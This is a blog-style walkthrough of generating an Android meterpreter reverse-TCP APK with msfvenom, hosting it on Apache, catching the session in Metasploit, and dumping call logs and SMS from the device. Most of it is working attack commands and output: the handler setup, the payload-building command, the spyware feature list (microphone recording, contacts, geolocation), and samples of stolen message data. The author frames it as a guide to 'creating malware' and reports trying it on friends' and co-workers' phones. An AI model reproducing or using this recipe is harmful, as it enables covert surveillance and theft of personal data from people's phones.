This was an interesting topic that I ran across not too long ago... and seems that the process for generating a meterpreter payload for an android device is very simple. However actually deploying this 'malware' payload to android devices in the wild may be a bit of a different story. Likely it would take plenty of development of the actual meterpreter source code (which is opensource), getting registered on the Google App Store, and then getting past the application vetting they do when you put something out there.. but anyhow that is a topic for another day, so lets get started!
First off we get our metasploit framework console up and running.
Secondly we will setup a multi-pupose exploit handler to catch our Android based reverse TCP meterpreter
msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost https://www.linkedin.com/redir/invalid-link-page?url=172%2e16%2e2%2e253 lhost => https://www.linkedin.com/redir/invalid-link-page?url=172%2e16%2e2%2e253 msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > set exitonsession false exitonsession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on https://www.linkedin.com/redir/invalid-link-page?url=172%2e16%2e2%2e253%3A4444 msf exploit(handler) > [*] Starting the payload handler...
Now we will setup a quick and dirty delivery mechanism to get the Android .apk app from our attacking machine to the Android device. We will do this by simply using our builtin apache server on Kali Linux.
root@nethunterarch:/var/www/html# service apache2 start root@nethunterarch:/var/www/html# netstat -ant | grep LISTEN | grep 80 tcp6 0 0 :::80 :::* LISTEN
Now for our payload... Using the canned / builtin payloads from metasploit we can use 'msfvenom' to generate the app and then just dump the payload into any empty file with a '.apk' file extension.
root@nethunterarch:/var/www/html# msfvenom -p android/meterpreter/reverse_tcp LHOST=https://www.linkedin.com/redir/invalid-link-page?url=172%2e16%2e2%2e253 LPORT=4444 > myapp.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8839 bytes root@nethunterarch:/var/www/html# ls myapp.apk
And that is! you now have an Android application that will execute an Android based meterpreter! pretty simple right ... So now to play around with it a little bit you will need a windows machine with the Android Studio (Available here: https://developer.android.com/studio/index.html) installed. The install will take a bit if you already don't already have it, I just did the default install and grabbed some coffee.
After the install is done we will have to get to the 'AVD Manager' - this is the part of Android Studio that manages the virtual android devices. Once we have the AVD Manager up we will be able to launch a wizard to create our first virtual Android device... this process is not complicated and really not in the scope of this post so that part is up to you =)
So after we have our virtual Android device built you simply hit the little play button and it will open the emulator with your device. Once started we just have to get our evil app on the phone. It is important to note that by default the virtual android devices have the security setting for allowing untrusted app installations disabled, an actual Android device in the wild is likely to have this setting enabled by default and will prompt the user to disable the setting before allowing them to install the app.
After the app has been installed on the virtual Android device and started we can catch our meterpreter on our attacking machine
The meterpreter build for android is pretty full featured with lots of tools
meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values help Help menu info Displays information about a Post module irb Drop into irb scripting mode load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for 'load' uuid Get the UUID for the current session write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- execute Execute a command getuid Get the user that the server is running as localtime Displays the target system's local date and time ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam Android Commands ================ Command Description ------- ----------- activity_start Start an Android activity from a Uri string check_root Check if device is rooted dump_calllog Get call log dump_contacts Get contacts list dump_sms Get sms messages geolocate Get current lat-long using geolocation hide_app_icon Hide the app icon from the launcher interval_collect Manage interval collection capabilities send_sms Sends SMS from target session set_audio_mode Set Ringer Mode sqlite_query Query a SQLite database from storage wakelock Enable/Disable Wakelock wlan_geolocate Get current lat-long using WLAN information
I like the 'check_root' command as I could imagine in a 'real-world' scenario if someone has a rooted phone they are likely going to have many security controls mis-configured on both on the Android device as well as any other system it may come into contact with, which could be a good pivot into a corporate or home network.
As you can see in the shot below our virtual Android device is indeed rooted! I honestly didn't expect this but interesting bit if information to know, also I have ran two other commands 'dump_calllog' and 'dump_sms'.
These two commands were pretty interesting to be as you essentially end up with a massive amount of data from the device (I performed all this on my actual android phone and was surprised how quickly information can be ex filtrated from your device).
root@nethunterarch:~# cat calllog_dump_20170214111302.txt ================= [+] Call log dump ================= Date: 2017-02-14 11:13:02 -0700 OS: Android 5.1.1 - Linux 3.10.0+ (x86_64) Remote IP: 172.16.2.252 Remote Port: 7751 #1 Number : 6505551212 Name : null Date : Tue Feb 14 10:15:28 MST 2017 Type : INCOMING Duration: 3 root@nethunterarch:~# cat sms_dump_20170214111310.txt ===================== [+] SMS messages dump ===================== Date: 2017-02-14 11:13:10 -0700 OS: Android 5.1.1 - Linux 3.10.0+ (x86_64) Remote IP: 172.16.2.252 Remote Port: 7751 #1 Type : Incoming Date : 2017-02-14 10:15:36 Address : 6505551212 Status : NOT_RECEIVED Message : Don't forget the marshmallows! #2 Type : Outgoing Date : 2017-02-14 10:14:26 Address : (575) 519-9637 Status : NOT_RECEIVED Message : Testing txt
So my next exploration was to see what our canned payload looked like in memory, and turns out that it looks just like any other app on the phone...
somewhat to my disappointment I was unable to get meterpreter to migrate to other PIDs or otherwise get out of this standard application context. That being said I am sure this can be done and the hour or so I was playing around with it is likely not enough time to deduce such a method. The other interesting note is that if the user does a 'Force Stop' the meterpreter session will die... fully expected this behavior but interesting none the less.
And there you have it a quick spitball guide to creating malware for android devices. I have tested this on my own devices as well as some buddies and co-workers and it seems to work on all versions of android up to this point anyhow.